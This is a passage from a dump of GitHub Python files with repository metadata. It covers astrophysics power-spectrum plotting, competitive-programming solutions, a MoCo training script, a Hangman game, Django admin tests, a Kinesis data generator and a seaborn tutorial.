color='violet')\r\nplt.plot(k_hMpc[counts[:, int_mu[1]] > 0, int_mu[1]], (p3d_hMpc)[counts[:, int_mu[1]] > 0, int_mu[1]]/P_L.__call__(k_hMpc[counts[:, int_mu[1]] > 0, int_mu[1]]), color='cyan')\r\nplt.plot(k_hMpc[counts[:, int_mu[2]] > 0, int_mu[2]], (p3d_hMpc)[counts[:, int_mu[2]] > 0, int_mu[2]]/P_L.__call__(k_hMpc[counts[:, int_mu[2]] > 0, int_mu[2]]), color='yellow')\r\nplt.plot(k_hMpc[counts[:, int_mu[3]] > 0, int_mu[3]], (p3d_hMpc)[counts[:, int_mu[3]] > 0, int_mu[3]]/P_L.__call__(k_hMpc[counts[:, int_mu[3]] > 0, int_mu[3]]), color='red')\r\n\r\nprint(\"k mu = 0 =\", k_hMpc[:, int_mu[0]])\r\nprint(\"k mu = 1 =\", k_hMpc[:, int_mu[3]])\r\nprint(\"cts mu = 0 =\", counts[:, int_mu[0]])\r\nprint(\"cts mu = 1 =\", counts[:, int_mu[3]])\r\nprint(\"p3d mu = 0 = \", (p3d_hMpc)[:, int_mu[0]])\r\nprint(\"p3d mu = 1 = \", (p3d_hMpc)[:, int_mu[3]])\r\n\r\n# load Ly alpha from Mahdi\r\nif res == \"1.0\":\r\n deltaF_file = os.path.join(save_dir, 'noiseless_maps/map_TNG_true_1.0_z2.4.hdf5')\r\n deltaF = h5py.File(deltaF_file,'r')['map'][:]\r\nelif res == \"0.5\":\r\n deltaF_file = os.path.join(save_dir, 'map_TNG_true_0.5_z2.4.hdf5')\r\n deltaF = h5py.File(deltaF_file,'r')['map'][:]\r\nelif res == \"0.25\":\r\n deltaF_file = os.path.join(save_dir, 'map_TNG_true_0.25_z2.5_820_voxels.hdf5')\r\n deltaF = h5py.File(deltaF_file,'r')['map'][:]\r\nelif res == \"0.05\":\r\n tau_file = os.path.join(save_dir,'spectra_z2.4/spectra_TNG_true_1.0_z2.4.hdf5')\r\n f = h5py.File(tau_file, 'r')\r\n tau = gf(f['tau/H/1/1215'][:], 1, mode='wrap')\r\n print(tau.shape)\r\n plt.figure(1)\r\n plot_skewer(tau, color=colors[sum%len(colors)], ls='-', label='tau high', skewer_id=150)\r\n plt.legend()\r\n #plt.xscale('log')\r\n #plt.yscale('log')\r\n plt.xlabel(\"r [Mpc/h]\")\r\n plt.ylabel(\"tau(r)\")\r\n plt.xlim([0., Lbox])\r\n #plt.ylim([np.sqrt(1.e-3), np.sqrt(.1)])\r\n plt.ylim([-0.5, 50.])\r\n plt.savefig(f\"tau_fgpa_rsd_high{paste_str}_ngrid{ngrid}.png\")\r\n print(\"mean, std of tau high = \", np.mean(tau), np.std(tau))\r\n redshift = f['Header'].attrs['redshift']\r\n deltaF = tau2deltaF(tau, redshift, mean_F=None)\r\n\r\n# compute power spectrum\r\nk_hMpc, p1d_hMpc = compute_pk1d(deltaF, Lbox)\r\n\r\n# plot power spectrum\r\nplt.figure(2)\r\nplt.plot(k_hMpc, p1d_hMpc*k_hMpc/np.pi, label='TNG')\r\nplt.legend()\r\nplt.xscale('log')\r\nplt.yscale('log')\r\nplt.xlabel(\"k [h/Mpc]\")\r\nplt.ylabel(\"k P(k)/pi\")\r\nplt.xlim([0.03, 20.])\r\nplt.ylim([1.e-3, .1])\r\nplt.savefig(f\"power_fgpa_rsd_high{paste_str}_ngrid{ngrid}.png\")\r\nplt.close()\r\nnp.savez(f\"power1d_tng_res{res}.npz\", p1d_hMpc=p1d_hMpc, k_hMpc=k_hMpc)\r\n\r\nk_hMpc, mu, p3d_hMpc, counts = compute_pk3d(deltaF, Lbox, n_k_bins, n_mu_bins)\r\nprint(mu)\r\n#mu.shape = 20, 16\r\n\r\nno_nans = 0\r\nfor i in range(n_k_bins):\r\n if not np.any(np.isnan(mu[i])): no_nans = i\r\nint_mu = []\r\nfor i in range(len(mu_want)):\r\n int_mu.append(np.argmin(np.abs(mu_want[i] - mu[no_nans])))\r\nnp.savez(f\"power3d_tng_res{res}.npz\", p3d_hMpc=p3d_hMpc, k_hMpc=k_hMpc, mu=mu, counts=counts)\r\n\r\nprint(\"k and mu = 1, p3D = \", k_hMpc[:, int_mu[3]], (p3d_hMpc)[:, int_mu[3]])\r\n\r\n\r\nplt.figure(3)\r\nplt.plot(k_hMpc[counts[:, int_mu[0]] > 0, int_mu[0]], (p3d_hMpc)[counts[:, int_mu[0]] > 0, int_mu[0]]/P_L.__call__(k_hMpc[counts[:, int_mu[0]] > 0, int_mu[0]]), color='violet', ls='--')\r\nplt.plot(k_hMpc[counts[:, int_mu[1]] > 0, int_mu[1]], (p3d_hMpc)[counts[:, int_mu[1]] > 0, int_mu[1]]/P_L.__call__(k_hMpc[counts[:, int_mu[1]] > 0, int_mu[1]]), color='cyan', ls='--')\r\nplt.plot(k_hMpc[counts[:, int_mu[2]] > 0, int_mu[2]], (p3d_hMpc)[counts[:, int_mu[2]] > 0, int_mu[2]]/P_L.__call__(k_hMpc[counts[:, int_mu[2]] > 0, int_mu[2]]), color='yellow', ls='--')\r\nplt.plot(k_hMpc[counts[:, int_mu[3]] > 0, int_mu[3]], (p3d_hMpc)[counts[:, int_mu[3]] > 0, int_mu[3]]/P_L.__call__(k_hMpc[counts[:, int_mu[3]] > 0, int_mu[3]]), color='red', ls='--')\r\nplt.plot([], [], ls='--', label='TNG')\r\nplt.plot([], [], ls='-', label='FGPA')\r\nplt.legend()\r\n#plt.ylim([0., 1.])\r\nplt.ylim([0., 0.3])\r\nplt.xlim([0.03, 20.])\r\nplt.xscale('log')\r\n#plt.yscale('log')\r\nplt.xlabel(\"k [h/Mpc]\")\r\nplt.ylabel(\"P(k)/P_L(k)\")\r\nplt.savefig(f\"power3d_fgpa_rsd_high{paste_str}_ngrid{ngrid}.png\")\r\nplt.close()\r\n","repo_name":"boryanah/abacus_tng_lyalpha","sub_path":"test_fgpa.py","file_name":"test_fgpa.py","file_ext":"py","file_size_in_byte":7397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8260685301","text":"from sys import stdin\nfrom collections import defaultdict\ninput = stdin.readline\n\ndef dfs(s, c):\n if s == b:\n ans.append(c)\n return\n for i in dic[s]:\n if visit.get(i[1]):\n continue\n visit[i[1]] = True\n dfs(i[1], c + i[0])\n\n\nN, M = map(int, input().split())\ndic = defaultdict(list)\nans = []\n\nfor i in range(N-1):\n a, b, c = map(int, input().split())\n dic[a].append((c, b))\n dic[b].append((c, a))\n\nfor i in range(M):\n visit = dict()\n a, b = map(int, input().split())\n visit[a] = True\n dfs(a, 0)\nfor i in ans:\n print(i)","repo_name":"tagrn/BOJ_Study","sub_path":"211129/1240.py","file_name":"1240.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71415090167","text":"from datetime import datetime\nfrom functools import partial\nfrom PIL import Image\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision import datasets\nfrom torchvision.models import resnet\nfrom tqdm import tqdm\nimport argparse\nimport json\nimport math\nimport os\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport random\nfrom PIL import ImageFilter\n\n# original util library\nfrom mocotools import mocoutil\n\nparser = argparse.ArgumentParser(description='Train MoCo on JF cases')\n\nparser.add_argument('-a', '--arch', default='resnet18')\n\n# lr: 0.06 for batch 512 (or 0.03 for batch 256)\nparser.add_argument('--lr', '--learning-rate', default=0.0001, type=float, metavar='LR', \n help='initial learning rate', dest='lr')\nparser.add_argument('--epochs', default=200, type=int, metavar='N', \n help='number of total epochs to run')\nparser.add_argument('--schedule', default=[120, 160], nargs='*', type=int, \n help='learning rate schedule (when to drop lr by 10x); does not take effect if --cos is on')\nparser.add_argument('--cos', action='store_true', \n help='use cosine lr schedule')\n\nparser.add_argument('-b', '--batch-size', default=8, type=int, metavar='N', \n help='mini-batch size')\nparser.add_argument('--wd', default=5e-4, type=float, metavar='W', help='weight decay')\n\n# moco specific configs:\nparser.add_argument('--moco-dim', default=128, type=int, \n help='feature dimension')\nparser.add_argument('--moco-k', default=4096, type=int, \n help='queue size; number of negative keys') # original deafult 65536\nparser.add_argument('--moco-m', default=0.99, type=float, \n help='moco momentum of updating key encoder')\nparser.add_argument('--moco-t', default=0.1, type=float, \n help='softmax temperature')\n\nparser.add_argument('--bn-splits', default=8, type=int, \n help='simulate multi-gpu behavior of BatchNorm in one gpu; 1 is SyncBatchNorm in multi-gpu')\n\nparser.add_argument('--symmetric', action='store_true', \n help='use a symmetric loss function that backprops to both crops')\n\n# utils\nparser.add_argument('-d', '--data', default='', type=str, metavar='PATH',\n help='path to data folder')\nparser.add_argument('--resume', default='', type=str, metavar='PATH', \n help='path to latest checkpoint (default: none)')\nparser.add_argument('--results-dir', default='', type=str, metavar='PATH', \n help='path to cache (default: none)')\n\n\nargs = parser.parse_args() # running in command line\n\nif args.results_dir == '':\n args.results_dir = './cache-' + datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S-moco\")\n\n# these value need to be set for each dataset\nnormalize = transforms.Normalize(mean=[0.85, 0.7, 0.78],\n std=[0.15, 0.24, 0.2])\n\naugmentation = [\n transforms.RandomRotation(90), # rotate shoud be first\n transforms.CenterCrop(200),\n transforms.RandomApply([\n transforms.ColorJitter(brightness=0.07, # 0.4\n contrast=0.15, # 0.4\n saturation=0.6,\n hue=0.03) # not strengthened # 0.1\n ], p=1),# 0.8\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n transforms.ToTensor(),\n normalize\n]\n\ntrain_dataset = datasets.ImageFolder(args.data,\n mocoutil.TwoCropsTransform(transforms.Compose(augmentation)))\n\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, shuffle=True,\n num_workers=8, pin_memory=True, drop_last=True)\n\n# create model\nmodel = mocoutil.ModelMoCo(\n dim=args.moco_dim,\n K=args.moco_k,\n m=args.moco_m,\n T=args.moco_t,\n arch=args.arch,\n bn_splits=args.bn_splits,\n symmetric=args.symmetric,\n ).cuda()\n\n\n# train for one epoch\ndef train(net, data_loader, train_optimizer, epoch, args):\n net.train()\n adjust_learning_rate(optimizer, epoch, args)\n\n total_loss = 0.0\n total_num = 0\n train_bar = tqdm(data_loader)\n\n\n for tb in train_bar:\n images, _ = tb\n im_1, im_2 = images[0].cuda(non_blocking=True), images[1].cuda(non_blocking=True)\n\n loss = net(im_1, im_2)\n\n train_optimizer.zero_grad()\n loss.backward()\n train_optimizer.step()\n\n total_num += data_loader.batch_size\n total_loss += loss.item() * data_loader.batch_size\n train_bar.set_description('Train Epoch: [{}/{}], lr: {:.6f}, Loss: {:.4f}'.format(epoch, args.epochs, optimizer.param_groups[0]['lr'], total_loss / total_num))\n\n return total_loss / total_num\n\n# lr scheduler for training\ndef adjust_learning_rate(optimizer, epoch, args):\n \"\"\"Decay the learning rate based on schedule\"\"\"\n lr = args.lr\n if args.cos: # cosine lr schedule\n lr *= 0.5 * (1. + math.cos(math.pi * epoch / args.epochs))\n else: # stepwise lr schedule\n for milestone in args.schedule:\n lr *= 0.1 if epoch >= milestone else 1.\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n# define optimizer\n#optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, weight_decay=args.wd, momentum=0.9)\noptimizer = torch.optim.Adam(model.parameters(), lr=args.lr)\n\n# load model if resume\nepoch_start = 1\nif args.resume is not '':\n checkpoint = torch.load(args.resume)\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n epoch_start = checkpoint['epoch'] + 1\n print('Loaded from: {}'.format(args.resume))\n\n# logging\nresults = {'train_loss': [], 'test_acc@1': []}\nif not os.path.exists(args.results_dir):\n os.mkdir(args.results_dir)\n# dump args\nwith open(args.results_dir + '/args.json', 'w') as fid:\n json.dump(args.__dict__, fid, indent=2)\n\n# training loop\nfor epoch in range(epoch_start, args.epochs + 1):\n train_loss = train(model, train_loader, optimizer, epoch, args)\n if (epoch == 1) | (epoch % 10 == 0): \n torch.save({'epoch': epoch, 'state_dict': model.state_dict(), 'optimizer' : optimizer.state_dict(),}, '{}/epoch{}.pth'.format(args.results_dir, str(epoch)))\n","repo_name":"uegamiw/MIXTURE","sub_path":"2_UIP_MoCo_1GPU.py","file_name":"2_UIP_MoCo_1GPU.py","file_ext":"py","file_size_in_byte":6343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73322362165","text":"import math\nimport logging\nimport sys\n\nlogger = logging.getLogger(__name__)\n\ndef rolling_hash(x,m):\n multiplier = 17\n tot = 0\n for c in x:\n tot = (tot * multiplier + ord(c) ) % m\n\n return tot\n\ndef fractional_hash(x, m):\n FRACTION = 0.61833\n return math.floor(((x * FRACTION) % 1) * m)\n\nclass num_hash_table:\n def __init__(self):\n self._arr = []\n self._hash = fractional_hash\n self._count = 0\n\n def _rehash(self):\n new_arr = [[] for _ in self._arr]\n for l in self._arr:\n for pair in l:\n k = self._hash(pair[0], len(new_arr))\n new_arr[k].append(pair)\n self._arr = new_arr\n\n def __setitem__(self, k, v):\n if self._count * 3 >= len(self._arr):\n self._arr = self._arr + [[] for x in range(1+ len(self._arr))]\n self._rehash()\n hashed = self._hash(k, len(self._arr))\n for i, pair in enumerate(self._arr[hashed]):\n if pair[0] == k:\n self._arr[hashed][i] = (k,v)\n else:\n self._arr[hashed].append((k,v))\n self._count += 1\n logger.debug('After putting k: %d, v: %d, arr is %s' % (k, v,self._arr))\n\n def __getitem__(self, k):\n for pair in self._arr[self._hash(k, len(self._arr))]:\n if pair[0] == k:\n return pair[1]\n raise KeyError(\"This key is not inside\")\n","repo_name":"yarnspinnered/algorithms","sub_path":"algorithms/my_hashes.py","file_name":"my_hashes.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27017463567","text":"import random, sys\n\nHANGMAN_PICS = [r\"\"\"\n +--+\n | |\n |\n |\n |\n |\n=====\"\"\",\nr\"\"\"\n +--+\n | |\n O |\n |\n |\n |\n=====\"\"\",\nr\"\"\"\n +--+\n | |\n O |\n | |\n |\n |\n=====\"\"\",\nr\"\"\"\n +--+\n | |\n O |\n/| |\n |\n |\n=====\"\"\",\nr\"\"\"\n +--+\n | |\n O |\n/|\\ |\n |\n |\n=====\"\"\",\nr\"\"\"\n +--+\n | |\n O |\n/|\\ |\n/ |\n |\n=====\"\"\",\nr\"\"\"\n +--+\n | |\n O |\n/|\\ |\n/ \\ |\n |\n=====\"\"\"]\n\nCATEGORY = 'Country'\nWORDS = 'SCOTLAND WALES DENMARK FINLAND NORWAY SWEDEN SWITZERLAND ESTONIA LATVIA AUSTRIA BELGIUM FRANCE GERMANY ITALY NETHERLANDS MEXICO CANADA UKRAINE RUSSIA GREECE SPAIN ROMANIA BULGARIA'.split()\n\ndef main():\n print('Hangman, by Al Sweigart al@inventwithpython.com')\n\n missedLetters = []\n correctLetters = []\n secretWord = random.choice(WORDS)\n\n while True:\n drawHangman(missedLetters, correctLetters, secretWord)\n guess = getPlayerGuess(missedLetters + correctLetters)\n\n if guess in secretWord:\n correctLetters.append(guess)\n foundAllLetters = True\n for secretWordLetter in secretWord:\n if secretWordLetter not in correctLetters:\n foundAllLetters = False\n break\n if foundAllLetters:\n print('Yes! The secret word is:', secretWord)\n print('You have won!')\n break\n else:\n missedLetters.append(guess)\n if len(missedLetters) == len(HANGMAN_PICS) - 1:\n drawHangman(missedLetters, correctLetters, secretWord)\n print('You have run out of guesses!')\n print('The word was \"{}\"'.format(secretWord))\n break\n\ndef drawHangman(missedLetters, correctLetters, secretWord):\n print(HANGMAN_PICS[len(missedLetters)])\n print('The category is:', CATEGORY)\n print()\n\n print('Пропущенные буквы: ', end='')\n for letter in missedLetters:\n print(letter, end=' ')\n if len(missedLetters) == 0:\n print('Пропущенных букв пока нет.')\n print()\n\n blanks = ['_'] * len(secretWord)\n for i in range(len(secretWord)):\n if secretWord[i] in correctLetters:\n blanks[i] = secretWord[i]\n\n print(' '.join(blanks))\n\ndef getPlayerGuess(alreadyGuessed):\n while True:\n print('Guess a letter.')\n guess = input('> ').upper()\n if len(guess) != 1:\n print('Пожалуйста, введите одну букву.')\n elif guess in alreadyGuessed:\n print('Вы уже угадали эту букву. Выберите снова.')\n elif not guess.isalpha():\n print('Пожалуйста, введите БУКВУ.')\n else:\n return guess\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n sys.exit()\n","repo_name":"SadeVast/Python_Projects","sub_path":"Chapter_34/Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32852616884","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\nres = 0\n\nfor i in range(1, n):\n s = sum([int(j) for j in str(i)])\n if i + s == n:\n res = i\n break\n\nprint(0 if res == 0 else res)","repo_name":"DohyunJegal/Baekjoon","sub_path":"class2/2231.py","file_name":"2231.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14313672117","text":"from datetime import date\n\nfrom django.contrib import admin\nfrom django.contrib.admin.sites import AdminSite\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import RequestFactory, TestCase\nfrom django.urls import reverse\n\nfrom ..admin import CandidateAdmin\nfrom ..models import Candidate\n\n\nclass CandidateAdminTest(TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n self.site = AdminSite()\n self.candidate = Candidate.objects.create(\n status='A',\n firstname='John',\n lastname='Doe',\n email='johndoe@example.com',\n birth_date=date(1990, 1, 1),\n phonenumber='1234567890',\n job='12345',\n personality='I am outgoing',\n salary='100000',\n gender='M',\n experience=True,\n smoker='N',\n file=SimpleUploadedFile('file.txt', b'file_content'),\n image=SimpleUploadedFile('image.jpg', b'image_content'),\n note='test note',\n languages=['Python', 'Javascript'],\n frameworks=['Django'],\n databases=['PostgreSQL', 'MySQL'],\n libraries=['Bootstrap', 'jQuery'],\n mobile=['Flutter', 'React native'],\n others=['GIT', 'Docker'],\n institution='Example University',\n course='Computer Science',\n started_course=date(2010, 1, 1),\n finished_course=date(2014, 1, 1),\n course_description='Description',\n course_status='I have completed the course',\n company='Example Company',\n position='Software Developer',\n started_job=date(2014, 1, 1),\n finished_job=date(2018, 1, 1),\n about_job='Description',\n employed=True,\n remote=True,\n travel=True,\n message='Test message'\n )\n self.candidate_pending = Candidate.objects.create(\n status='P',\n firstname='John',\n lastname='Pending',\n email='johndoe@example.com',\n birth_date=date(1990, 1, 1),\n phonenumber='1234567890',\n job='12345',\n personality='I am outgoing',\n salary='100000',\n gender='M',\n experience=True,\n smoker='N',\n file=SimpleUploadedFile('file.txt', b'file_content'),\n image=SimpleUploadedFile('image.jpg', b'image_content'),\n note='test note',\n languages=['Python', 'Javascript'],\n frameworks=['Django'],\n databases=['PostgreSQL', 'MySQL'],\n libraries=['Bootstrap', 'jQuery'],\n mobile=['Flutter', 'React native'],\n others=['GIT', 'Docker'],\n institution='Example University',\n course='Computer Science',\n started_course=date(2010, 1, 1),\n finished_course=date(2014, 1, 1),\n course_description='Description',\n course_status='I have completed the course',\n company='Example Company',\n position='Software Developer',\n started_job=date(2014, 1, 1),\n finished_job=date(2018, 1, 1),\n about_job='Description',\n employed=True,\n remote=True,\n travel=True,\n message='Test message'\n )\n self.candidate_disapproved = Candidate.objects.create(\n status='D',\n firstname='John',\n lastname='Disapproved',\n email='johndoe@example.com',\n birth_date=date(1990, 1, 1),\n phonenumber='1234567890',\n job='12345',\n personality='I am outgoing',\n salary='100000',\n gender='M',\n experience=True,\n smoker='N',\n file=SimpleUploadedFile('file.txt', b'file_content'),\n image=SimpleUploadedFile('image.jpg', b'image_content'),\n note='test note',\n languages=['Python', 'Javascript'],\n frameworks=['Django'],\n databases=['PostgreSQL', 'MySQL'],\n libraries=['Bootstrap', 'jQuery'],\n mobile=['Flutter', 'React native'],\n others=['GIT', 'Docker'],\n institution='Example University',\n course='Computer Science',\n started_course=date(2010, 1, 1),\n finished_course=date(2014, 1, 1),\n course_description='Description',\n course_status='I have completed the course',\n company='Example Company',\n position='Software Developer',\n started_job=date(2014, 1, 1),\n finished_job=date(2018, 1, 1),\n about_job='Description',\n employed=True,\n remote=True,\n travel=True,\n message='Test message'\n )\n self.admin_user = CandidateAdmin(Candidate, admin.site)\n\n def test_change_view_redirect(self):\n \"\"\"Test that after saving a candidate, user is redirected to the candidate detail page.\"\"\"\n request = self.factory.post(reverse('admin:human_resource_candidate_change', args=[self.candidate.id]), data={\n 'firstname': 'John',\n 'lastname': 'Doe',\n 'email': 'johndoe@example.com',\n 'status': 'A'\n })\n request.user = None\n response = self.admin_user.change_view(request, str(self.candidate.id))\n self.assertEqual(response['Location'], self.candidate.get_absolute_url())\n\n def test_get_fields(self):\n request = self.factory.get('/admin/candidate/')\n fields = self.admin_user.get_fields(request, self.candidate)\n self.assertNotIn('firstname', fields)\n self.assertNotIn('lastname', fields)\n\n def test_job_status_approved(self):\n status_text = self.admin_user.job_status(self.candidate)\n self.assertIn('color: #28a745', status_text)\n self.assertIn('Approved', status_text)\n\n def test_job_status_pending(self):\n status_text = self.admin_user.job_status(self.candidate_pending)\n self.assertIn('color: #fea95e', status_text)\n self.assertIn('Pending', status_text)\n\n def test_job_status_disapproved(self):\n status_text = self.admin_user.job_status(self.candidate_disapproved)\n self.assertIn('color: red', status_text)\n self.assertIn('Disapproved', status_text)\n\n def test_list_display(self):\n list_display = self.admin_user.get_list_display(None)\n self.assertEqual(list_display, ['__str__', 'email', 'job', 'created', 'job_status', '_'])\n\n def test_boolean(self):\n value = self.admin_user._(self.candidate)\n expected_value = True\n self.assertEqual(value, expected_value)\n\n value_pending = self.admin_user._(self.candidate_pending)\n expected_value_pending = None\n self.assertEqual(value_pending, expected_value_pending)\n\n value_disapproved = self.admin_user._(self.candidate_disapproved)\n expected_value_disapproved = False\n self.assertEqual(value_disapproved, expected_value_disapproved)\n","repo_name":"Pythonian/django_mastery","sub_path":"human_resource/tests/test_admin.py","file_name":"test_admin.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"20775627783","text":"\"\"\"BasicFunctions URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom candidateManager.views import * \n\n\nurlpatterns = [\n \n url(r'^$', Candidates_List.as_view(), name='candidate_list'),\n url(r'^new$', Candidates_Create.as_view(), name='candidate_new'),\n url(r'^edit/(?P\\d+)$', Candidates_Update.as_view(), name='candidate_edit'),\n url(r'^delete/(?P\\d+)$', Candidates_Delete.as_view(), name='candidate_delete'),\n url(r'^detail/(?P\\d+)$', Candidates_Detail.as_view(), name='candidate_detail'),\n url(r'^notes/add/(?P\\d+)$', Note_Create.as_view(), name='notes_create'),\n]\n","repo_name":"rayan1234sn/BasicFuncitons","sub_path":"candidateManager/candidate_urls.py","file_name":"candidate_urls.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21930003757","text":"import os\nimport json\nimport boto3\nimport random\n\n\ndef getData(iotName, lowVal, highVal):\n data = {}\n data['iotName'] = iotName\n data['iotValue'] = random.randint(lowVal, highVal)\n return data\n\n\nwhile 1:\n kinesis = boto3.client('kinesis')\n rnd = random.random()\n if (rnd < 0.01):\n data = json.dumps(getData('DemoSensor', 100, 120))\n kinesis.put_record(\n StreamName=os.environ['STREAM_NAME'],\n Data=data,\n PartitionKey='shardId-000000000000')\n print('***************************** anomaly ************************* {}'.format(data))\n else:\n data = json.dumps(getData('DemoSensor', 10, 20))\n kinesis.put_record(\n StreamName=os.environ['STREAM_NAME'],\n Data=data,\n PartitionKey='shardId-000000000000')\n print(data)\n","repo_name":"knakayama/aws-cloudformation-playground","sub_path":"kinesis/test1/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"13396489862","text":"from itertools import permutations\r\nN = int(input())\r\nS = input()\r\n# 全ての組み合わせ - (Si=Sj and Si=Sk and SandSk) - (j-i=k-j) \r\n\r\n# res = N**3\r\n\r\n# for i in range(N):\r\n# for j in range(N):\r\n# for k in range(N):\r\n# if not i N: continue\r\n if S[i] == S[k] or S[k] == S[j]: continue\r\n total -= 1\r\n\r\nprint(total) \r\n\r\n\r\n\r\n\r\n","repo_name":"takin6/algorithm-practice","sub_path":"at_coder/abc/old/162/d_2.py","file_name":"d_2.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27088299200","text":"# (05)*****************distplot part 02 in seaborn***************************\n\n# ------------importing the libraries\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import kde, norm\n\n# -----------importing the dataset in seaborn github repositry\ntip_df=sns.load_dataset('tips')\n# print(tip_df)\n\n# ////we use these parameters in dist function\nparameters=\"\"\"(a=None, bins=None, hist=True, kde=True, rug=False, fit=None, hist_kws=None, kde_kws=None, rug_kws=None, fit_kws=None, color=None, vertical=False, norm_hist=False, axlabel=None, label=None, ax=None, x=None)\"\"\"\n\n# /////this is the code of seaborn\n# ////if we want to increase the figure size than we use plt.figure function\n# plt.figure(figsize=(13,13))\n\nbins=[5,10,15,20,25,30,35,40,45,50,55]\n# /////if we want to change the line background color than we use set function\nsns.set() \n# sns.distplot(tip_df['total_bill'],bins=bins)\n\n# /////if we use xtrick than we shown the x-label indexs\nplt.xticks(bins)\n\n# /////when we want to change the line colors as we wish than we use hist-kws(histpgram-keywords) functions and we input in dictionary\n# //////when we want to change the edgecolor than we use edge color function\n# /////when we want to increse the linewidth than we use linewidth function\n# ////when we want to change the stple of the line then we use linestyle function\n# ////if we want to increrase or decrese the opacity of the line color than we use alpha function and we input value(0-1)\n# sns.distplot(tip_df['total_bill'],bins=bins,hist_kws={'color':'red','edgecolor':'yellow','linewidth':5,'linestyle':'--','alpha':0.9})\n\n# //////if we want to change the kernal-density-estimate(kde) color, opasity, linewidth, linestyle than we use kde_kws(kernal-density-estimate keywords) and it is also input in dictionary \n# sns.distplot(tip_df['total_bill'],bins=bins,hist_kws={'color':'red','edgecolor':'yellow','linewidth':5,'linestyle':'--','alpha':0.9}, kde_kws={'color':'g','linewidth':5,'linestyle':'--','alpha':0.9})\n\n# /////if we want to change the rug color,linewidth, linestyle,opasity than we use rug_kws function\n# sns.distplot(tip_df['total_bill'],bins=bins,hist_kws={'color':'red','edgecolor':'yellow','linewidth':5,'linestyle':'--','alpha':0.9}, kde_kws={'color':'g','linewidth':5,'linestyle':'--','alpha':0.9},rug=True,rug_kws={'color':'k','linewidth':3,'linestyle':'--','alpha':0.9})\n\n# //////if we want to change the normalize line color,linewidth,linestyle and opasity than we use fit_kws function and we also kde=False\n# /////if we want to show the label than we use label function\n# sns.distplot(tip_df['total_bill'],bins=bins,hist_kws={'color':'red','edgecolor':'yellow','linewidth':5,'linestyle':'--','alpha':0.9},kde=False,rug=True,rug_kws={'color':'k','linewidth':3,'linestyle':'--','alpha':0.9},fit=norm,fit_kws={'color':'m','linewidth':3,'linestyle':'--','alpha':0.9},label=\"Sultan's Production\")\n\n# /////if we want to multiple graph is showing gthe one graph than we use this function\nsns.distplot(tip_df['size'],label='size')\nsns.distplot(tip_df['tip'],label='tip')\nsns.distplot(tip_df['total_bill'],label='Total_Bill')\n\n\n# /////Creating the title, xlabel and also ylabel function\nplt.title(\"Histogram of Resturent\",fontsize=25)\nplt.xlabel(\"Total Bills\",fontsize=15)\nplt.ylabel(\"Indexs\",fontsize=15)\nplt.legend(loc=2)\n\n# /////if we want to sorting the values than we use sort function\n# print(tip_df.total_bill.sort_values())\n\n# ////to showing the graph we use plt.show() FUNCTION and this is the matplotli function\nplt.show()\n","repo_name":"tayyabmalik4/SeabornWithTayyab","sub_path":"05_displot_part_02.py","file_name":"05_displot_part_02.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34171402899","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Project : Python.\n# @File : baseline\n# @Time : 2022/11/22 上午9:02\n# @Author : yuanjie\n# @WeChat : meutils\n# @Software : PyCharm\n# @Description :\n\n\nfrom sklearn.metrics import mean_squared_error, roc_auc_score\nfrom sklearn.preprocessing import LabelEncoder\n\n# ME\nfrom meutils.pipe import *\nfrom meutils.hash_utils import md5\n\nfrom aizoo.tab.models import LGBMOOF\nfrom aizoo.tab.eda import EDA\nfrom aizoo.tab.feature_engineer import FE\n\n\n@decorator\ndef disk_cache(func, location='cachedir', *args, **kwargs):\n k = 